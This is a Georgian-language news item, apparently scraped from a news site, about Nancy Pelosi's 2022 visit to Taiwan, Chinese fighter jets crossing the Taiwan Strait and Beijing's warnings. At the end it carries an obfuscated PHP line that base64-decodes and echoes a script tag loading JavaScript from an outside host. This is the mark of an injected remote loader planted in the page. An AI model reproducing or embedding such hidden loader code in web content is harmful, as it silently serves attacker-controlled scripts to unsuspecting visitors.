celsiusi
ავერსი საქკაბელი

"ტაივანში მცხოვრები 23 მილიონი ადამიანისთვის ამერიკის შეერთებული შტატების სოლიდარობა დღეს უფრო მნიშვნელოვანია, ვიდრე ოდესმე, რადგან მსოფლიო არჩევანის წინაშე დგას ავტოკრატიასა და დემოკრატიას შორის", - ამის შესახებ აშშ-ის წარმომადგენელთა პალატის სპიკერი ნენსი პელოსი Twitter-ზე წერს. 

მისივე განცხადებით, კონგრესის წარმომადგებლების დელეგაციის ტაივანში ვიზიტი "არანაირად არ ეწინააღმდეგება შეერთებული შტატების გრძელვადიან პოლიტიკას, რომელსაც ტაივანის 1979 წლის ტაივანის ურთიერთობის აქტი ხელმძღვანელობს და აშშ-ჩინეთის ერთობლივი კომუნიკე და ექვსი გარანტია აქვს".

ცნობისთვის, ნენსი პელოსის თვითმფრინავი ტაივანში უკვე დაეშვა, მას აეროპორტში ქვეყნის დელეგაცია დახვდა. 

მას შემდეგ კი რაც პელოსი ტაივანში ჩავიდა, ჩინურმა მედიამ გაავრცელა ინფორმაცია, რომ ჩინური თვითმფრინავები ტაივანის სრუტეს კვეთენ. გავრცელებული ინფორმაციით, ისინი Su-35 საბრძოლო თვითმფრინავები არიან.

პარალელურად გავრცელდა ინფორმაცია, რომ ჩინეთში საჰაერო განგაში სიგნალების ხმა ისმის. 

ცნობისთვის, ტაივანს პეკინი თავის სუვერენულ ტერიტორიად მიიჩნევს, რის გამოც სი ძინპინის მთავრობამ ვაშინგტონი ორჯერ გააფრთხილა, რომ პელოსის იქ ვიზიტს მძიმე შედეგები მოჰყვება. 

549
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");